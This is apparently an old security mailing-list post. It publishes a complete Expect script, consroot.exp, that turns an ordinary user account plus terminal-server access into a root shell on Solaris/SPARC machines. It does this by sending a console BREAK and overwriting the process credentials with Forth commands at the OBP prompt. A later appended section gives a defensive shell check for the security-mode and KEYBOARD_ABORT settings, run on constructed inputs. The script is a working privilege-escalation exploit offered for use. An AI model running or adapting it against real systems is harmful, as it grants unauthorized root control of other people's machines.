`Hi there,
here is a fully automated script for getting a root shell using a normal user account
and (remote-)console access. The script was written by me based on an article
from phrack.com (article #53 - hacking forth by mudge)
---snip---
#
# ---> consroot.exp <---
# by mickeyX 16.6.2003
#
# connects to a SUN and a Terminalserver and hacks the OBP to get a root shell.
# You need:
# - a "normal" user account on a SUN
# - terminalserveraccess on the same SUN
#
# this was tested on:
# - MacOS X version 10.2.6 using expect 5.38.0
# - Solaris 8 using expect 5.25.0
# - ANNEX terminalservers
# - CYCLADES terminalservers
#
# This is just a prototype ! Use with care on other terminalservers !
#
#
set timeout 2
set MODE [lindex $argv 0]
set TARGET [lindex $argv 1]
set UID [lindex $argv 2]
set PW [lindex $argv 3]
set CTYPE [lindex $argv 4]
set TSERVER [lindex $argv 5]
set TPORT [lindex $argv 6]
set TPW [lindex $argv 7]
set LOG log.txt
proc usage {} {
puts "\nusage: expect consroot <MODE> <TARGET> <USER> <PW> <CONSOLETYPE> <TERMINALSERVER> <PORT> <TPW>"
puts "\twhere MODE is one of:"
puts "\t\tT = Target is using TELNET"
puts "\t\tS = Target is using SSH"
puts "\tTARGET = machine to hack"
puts "\tUSER = unprivileged user on target host"
puts "\tPW = password on target host"
puts "\n\twhere CONSOLETYPE is one of:"
puts "\t\tA = Target is connected to Annex Terminalserver"
puts "\t\tC = Target is connected to Cyclades Terminalserver\n"
puts "\tTERMINALSERVER = consoleaccess for target host"
puts "\tPORT = TCP/IP-port (!) on terminalserver where target is connected"
puts "\tTPW = password for terminalserverport\n"
exit 1
}
###
# MAIN
###
if { $argc < 8 } usage
# check for Terminalservertypes...
switch -- $CTYPE \
A {
} C {
} default usage
# check for connect-Mode...
switch -- $MODE \
T { spawn telnet $TARGET
set main_session $spawn_id
expect "ogin:"
send "$UID\n"
expect "assword"
send "$PW\n"
} S { spawn ssh -l $UID $TARGET
set main_session $spawn_id
expect "assword"
send "$PW\n"
} default usage
# start korn-shell...
expect { exp_continue }
send "exec /usr/bin/ksh\n"
# set defined prompt - so we can scan for it...
send "export PS1=PROMPT:\n"
# activate logging for getting the credentials address...
log_file -noappend $LOG
###
# get address for OBP-hacking:
###
send "/usr/bin/ps -o addr -p $$\n"
expect "ADDR"
expect "PROMPT:"
set ADRESS [exec sh "-c" "cat $LOG | grep -v PROMPT: | tail -1"]
puts "\nReceived ADRESS from shell was: $ADRESS\n"
###
###
###
# reset logfile...
exec sh "-c" "1>$LOG"
###
# get OS-architecture for OBP-hacking:
###
send "/usr/bin/isainfo -b\n"
expect "*" # clear expect buffer
expect "PROMPT:"
set ARC [exec sh "-c" "cat $LOG | tail -2 | head -1"]
puts "\nReceived Architecture was: $ARC\n"
exec "rm" "-f" "$LOG"
###
###
###
# connect to Terminalserver...
puts "\nPlease wait while connecting to Terminalserver...\n"
spawn telnet -e "#" $TSERVER $TPORT
switch -- $CTYPE \
A { puts "\nstarting Annex connect ...\n"
expect "Port password"
send "$TPW\n"
expect "Permission granted"
} C { puts "\nstarting Cyclades connect ...\n"
expect "Port*:"
send "$TPW\n"
expect "Password:"
send "$TPW\n"
expect "*"
}
# hack OBP...
send "#\n"
expect "telnet"
send "send brk\n"
expect "ok"
# let's ROCK and ROLL !!!
switch -- $ARC \
64 { send "hex 0 $ADRESS 20 + x@ 4 + l!\n"
} 32 { send "hex 0 $ADRESS 14 + l@ 4 + l!\n"
}
expect "ok"
send "go\r"
# deactivate logging...
log_file
exec rm "-f" "$LOG"
# give control to admin...
set spawn_id $main_session
send "\r"
expect "PROMPT:"
send "id\n"
expect "PROMPT:"
interact
---snip---
--
UNIX is like a wigwam: no windows, no gates, apache inside, stable.
Windows is not the answer - it's the question. No is the answer.
`
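The script above needs two things from the target: a BREAK on the serial console must drop the machine to the OBP `ok` prompt, and that prompt must accept Forth memory writes without a password. The following is an added example, not part of the original post, that audits both settings from the output of `eeprom security-mode` and the contents of `/etc/default/kbd`. The function name and the sample inputs are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): audit the two Solaris/SPARC
# settings the consroot.exp technique depends on. Inputs are passed as text so
# the check runs offline; on a real host pass "$(eeprom security-mode)" and
# "$(cat /etc/default/kbd)".

# check_obp_exposure EEPROM_LINE KBD_FILE_TEXT   (hypothetical helper name)
# Prints one finding per line; returns 0 if hardened, 1 if exposed.
check_obp_exposure() {
    eeprom_line=$1
    kbd_text=$2
    rc=0

    # eeprom prints "security-mode=<none|command|full>".
    mode=$(printf '%s\n' "$eeprom_line" | sed -n 's/^security-mode=//p')
    case $mode in
        command|full)
            echo "OK   security-mode=$mode (Forth at the ok prompt needs the firmware password)" ;;
        *)
            echo "FAIL security-mode=${mode:-unset} (ok prompt accepts memory writes unauthenticated)"
            rc=1 ;;
    esac

    # Commented-out lines are ignored; the last active KEYBOARD_ABORT line
    # wins, and the default when none is present is "enable".
    abort=$(printf '%s\n' "$kbd_text" |
            sed -n 's/^[[:space:]]*KEYBOARD_ABORT=//p' | tail -1)
    case ${abort:-enable} in
        disable)
            echo "OK   KEYBOARD_ABORT=disable (console BREAK is ignored)" ;;
        alternate)
            echo "WARN KEYBOARD_ABORT=alternate (BREAK ignored, alternate sequence still reaches OBP)" ;;
        *)
            echo "FAIL KEYBOARD_ABORT=${abort:-enable} (console BREAK drops to OBP)"
            rc=1 ;;
    esac
    return $rc
}

# Constructed sample inputs: a default, unhardened host.
SAMPLE_EEPROM='security-mode=none'
SAMPLE_KBD='# constructed /etc/default/kbd
#KEYBOARD_ABORT=enable'
check_obp_exposure "$SAMPLE_EEPROM" "$SAMPLE_KBD" || true
```

A host passes only when `security-mode` is `command` or `full`; `KEYBOARD_ABORT=alternate` is reported as a warning because it blocks the BREAK used here but still leaves a path to the `ok` prompt.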